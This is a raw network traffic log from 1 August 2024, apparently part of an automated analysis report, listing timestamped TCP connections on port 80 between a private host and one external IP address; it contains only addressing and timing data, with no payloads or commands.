                                                                  Aug 1, 2024 04:28:29.963813066 CEST4975780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:29.991353989 CEST8049757194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:30.145586967 CEST4975780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:31.005543947 CEST4975780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:31.005856037 CEST4975880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:31.011399984 CEST8049758194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:31.011487007 CEST4975880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:31.011619091 CEST4975880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:31.011683941 CEST8049757194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:31.011737108 CEST4975780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:31.016928911 CEST8049758194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:31.362543106 CEST4975880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:31.367782116 CEST8049758194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:31.367815971 CEST8049758194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:31.367842913 CEST8049758194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:31.825311899 CEST8049758194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:31.955735922 CEST4975880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:31.957824945 CEST8049758194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.078197956 CEST4975880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.078501940 CEST4975980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.083750963 CEST8049758194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.083831072 CEST4975880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.083901882 CEST8049759194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.083986998 CEST4975980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.084060907 CEST4975980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.089036942 CEST8049759194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.440689087 CEST4975980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.447751999 CEST8049759194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.447792053 CEST8049759194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.447822094 CEST8049759194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.816034079 CEST4976080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.821372986 CEST8049760194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.821604013 CEST4976080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.821604967 CEST4976080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.826766014 CEST8049760194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.850487947 CEST4975980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:32.856110096 CEST8049759194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:32.856184006 CEST4975980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:33.285335064 CEST4976080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:33.290493011 CEST8049760194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:33.290555000 CEST8049760194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:33.612303019 CEST8049760194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:33.790720940 CEST8049760194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:33.790924072 CEST4976080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:34.185820103 CEST4976080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:34.191340923 CEST8049760194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:34.191502094 CEST4976080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:34.207366943 CEST4976180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:34.213011026 CEST8049761194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:34.213232040 CEST4976180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:34.215106010 CEST4976180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:34.220380068 CEST8049761194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:34.565407038 CEST4976180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:34.570861101 CEST8049761194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:34.570895910 CEST8049761194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:34.570926905 CEST8049761194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:35.019808054 CEST8049761194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:35.143450975 CEST4976180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:35.197246075 CEST8049761194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:35.252782106 CEST4976180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:35.319360018 CEST4976180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:35.319755077 CEST4976280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:35.325164080 CEST8049761194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:35.325418949 CEST4976180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:35.325864077 CEST8049762194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:35.326059103 CEST4976280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:35.326060057 CEST4976280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:35.332895994 CEST8049762194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:35.674948931 CEST4976280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:35.680682898 CEST8049762194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:35.680721045 CEST8049762194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:35.680748940 CEST8049762194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:36.118098021 CEST8049762194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:36.252648115 CEST4976280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:36.252756119 CEST8049762194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:36.354053020 CEST4976280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:38.052563906 CEST4976280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:38.052974939 CEST4976380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:38.058211088 CEST8049763194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:38.058252096 CEST8049762194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:38.058326960 CEST4976380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:38.058386087 CEST4976280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:38.058491945 CEST4976380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:38.063458920 CEST8049763194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:38.409181118 CEST4976380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:38.416330099 CEST8049763194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:38.416368008 CEST8049763194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:38.416394949 CEST8049763194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:38.885725975 CEST8049763194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.024631977 CEST8049763194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.024863005 CEST4976380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.075939894 CEST4976480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.082695961 CEST8049764194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.082863092 CEST4976480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.082931995 CEST4976480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.087702036 CEST8049764194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.141386986 CEST4976580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.146372080 CEST8049765194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.146636963 CEST4976580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.146636963 CEST4976580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.157424927 CEST8049765194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.441781998 CEST4976480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.446800947 CEST8049764194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.446856022 CEST8049764194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.502939939 CEST4976580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:39.512217045 CEST8049765194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.512233973 CEST8049765194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.512248039 CEST8049765194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.926704884 CEST8049764194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:39.949520111 CEST8049765194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:40.067157030 CEST8049764194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:40.067553997 CEST4976480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:40.081511021 CEST8049765194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:40.081743002 CEST4976580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.313869953 CEST4976380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.313870907 CEST4976580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.313983917 CEST4976480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.319612980 CEST8049763194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:41.319833994 CEST4976380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.320050001 CEST8049765194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:41.320080042 CEST8049764194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:41.320249081 CEST4976480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.320251942 CEST4976580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.345402002 CEST4976680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.350635052 CEST8049766194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:41.350894928 CEST4976680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.350894928 CEST4976680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.355882883 CEST8049766194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:41.706020117 CEST4976680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:41.712862015 CEST8049766194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:41.712913990 CEST8049766194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:41.712941885 CEST8049766194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:42.172766924 CEST8049766194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:42.305392981 CEST8049766194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:42.305602074 CEST4976680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:42.486845016 CEST4976680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:42.487561941 CEST4976780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:42.492913008 CEST8049766194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:42.493154049 CEST4976680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:42.493268967 CEST8049767194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:42.493480921 CEST4976780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:42.493480921 CEST4976780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:42.499557018 CEST8049767194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:42.848356009 CEST4976780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:42.853581905 CEST8049767194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:42.853604078 CEST8049767194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:42.853616953 CEST8049767194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:43.289576054 CEST8049767194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:43.468014956 CEST8049767194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:43.468101025 CEST4976780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:44.598846912 CEST4976780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:44.599533081 CEST4976880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:44.604588032 CEST8049767194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:44.604629993 CEST8049768194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:44.604866982 CEST4976780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:44.604866982 CEST4976880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:44.604968071 CEST4976880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:44.610393047 CEST8049768194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:44.956042051 CEST4976880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:44.961477995 CEST8049768194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:44.961515903 CEST8049768194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:44.961546898 CEST8049768194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.082516909 CEST4976980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.083482981 CEST4976880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.087762117 CEST8049769194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.087907076 CEST4976980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.088018894 CEST4976980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.093163967 CEST8049769194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.128684044 CEST8049768194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.151582956 CEST8049768194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.151664972 CEST4976880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.268030882 CEST4977080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.273016930 CEST8049770194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.273138046 CEST4977080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.273287058 CEST4977080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.278707027 CEST8049770194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.442682028 CEST4976980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.448020935 CEST8049769194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.448160887 CEST8049769194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.627814054 CEST4977080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:45.633076906 CEST8049770194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.633116007 CEST8049770194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.633173943 CEST8049770194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.895598888 CEST8049769194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:45.955918074 CEST4976980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.023324013 CEST8049769194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.069933891 CEST8049770194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.143260956 CEST4976980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.143310070 CEST4977080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.203649044 CEST8049770194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.252671957 CEST4977080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.354981899 CEST4976980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.354981899 CEST4977080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.355510950 CEST4977180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.360608101 CEST8049771194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.360938072 CEST4977180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.363179922 CEST8049769194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.363250017 CEST8049770194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.363262892 CEST4976980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.363343954 CEST4977080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.364351988 CEST4977180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.369237900 CEST8049771194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.723465919 CEST4977180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:46.728763103 CEST8049771194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.728790045 CEST8049771194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:46.728806019 CEST8049771194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:47.165344000 CEST8049771194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:47.315305948 CEST4977180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:47.348716021 CEST8049771194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:47.424628019 CEST4977180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:47.876822948 CEST4977180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:47.882219076 CEST8049771194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:47.882302046 CEST4977180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:47.938962936 CEST4977280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:47.943928957 CEST8049772194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:47.944015980 CEST4977280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:47.944209099 CEST4977280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:47.948952913 CEST8049772194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:48.300312996 CEST4977280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:48.305500031 CEST8049772194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:48.305515051 CEST8049772194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:48.305526972 CEST8049772194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:48.767235041 CEST8049772194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:48.945471048 CEST8049772194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:48.948945045 CEST4977280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:49.300538063 CEST4977280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:49.301172018 CEST4977380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:49.306050062 CEST8049772194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:49.306087017 CEST8049773194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:49.306190014 CEST4977280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:49.306245089 CEST4977380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:49.306524038 CEST4977380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:49.312623024 CEST8049773194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:49.660434961 CEST4977380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:49.665654898 CEST8049773194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:49.665690899 CEST8049773194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:49.665721893 CEST8049773194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:50.120312929 CEST8049773194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:50.251307011 CEST8049773194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:50.251636982 CEST4977380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.187750101 CEST4977380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.191721916 CEST4977480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.192998886 CEST8049773194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.193067074 CEST4977380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.196561098 CEST8049774194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.196841002 CEST4977480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.197138071 CEST4977480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.202002048 CEST8049774194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.306385040 CEST4977580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.311480999 CEST8049775194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.311698914 CEST4977580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.311700106 CEST4977580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.317087889 CEST8049775194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.550384998 CEST4977480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.555665016 CEST8049774194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.555697918 CEST8049774194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.555723906 CEST8049774194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.659097910 CEST4977580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:51.665184975 CEST8049775194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:51.665680885 CEST8049775194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.019542933 CEST8049774194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.113900900 CEST8049775194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.127769947 CEST4977480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.200499058 CEST8049774194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.201561928 CEST4977580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.207408905 CEST8049775194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.207524061 CEST4977580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.315296888 CEST4977480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.330825090 CEST4977480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.331655979 CEST4977680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.336714029 CEST8049774194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.336755991 CEST8049776194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.336834908 CEST4977480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.336874962 CEST4977680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.336977005 CEST4977680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.341983080 CEST8049776194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.690565109 CEST4977680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:52.695812941 CEST8049776194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.695843935 CEST8049776194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:52.695878029 CEST8049776194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:53.138564110 CEST8049776194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:53.252654076 CEST4977680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:53.269494057 CEST8049776194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:53.455807924 CEST4977680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:53.486387014 CEST4977680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:53.491106987 CEST4977780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:53.491730928 CEST8049776194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:53.491947889 CEST4977680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:53.496077061 CEST8049777194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:53.496304989 CEST4977780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:53.496398926 CEST4977780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:53.501277924 CEST8049777194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:53.846669912 CEST4977780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:53.851761103 CEST8049777194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:53.851798058 CEST8049777194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:53.852140903 CEST8049777194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:54.306552887 CEST8049777194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:54.424545050 CEST4977780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:54.443778038 CEST8049777194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:54.627762079 CEST4977780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:54.699135065 CEST4977780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:54.704415083 CEST8049777194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:54.705018997 CEST4977780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:54.715157032 CEST4977880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:54.720267057 CEST8049778194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:54.721050024 CEST4977880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:54.721050978 CEST4977880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:54.726567030 CEST8049778194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:55.065433979 CEST4977880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:55.070676088 CEST8049778194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:55.070751905 CEST8049778194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:55.070800066 CEST8049778194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:55.505470991 CEST8049778194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:55.627796888 CEST4977880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:55.685601950 CEST8049778194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:55.815157890 CEST4977880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.072304010 CEST4977880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.072632074 CEST4977980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.254371881 CEST4978080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.295983076 CEST8049779194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.296020031 CEST8049780194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.296049118 CEST8049778194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:57.296096087 CEST4977980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.296452999 CEST4977880192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.296452999 CEST4978080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:57.296452999 CEST4978080192.168.2.4194.58.42.154
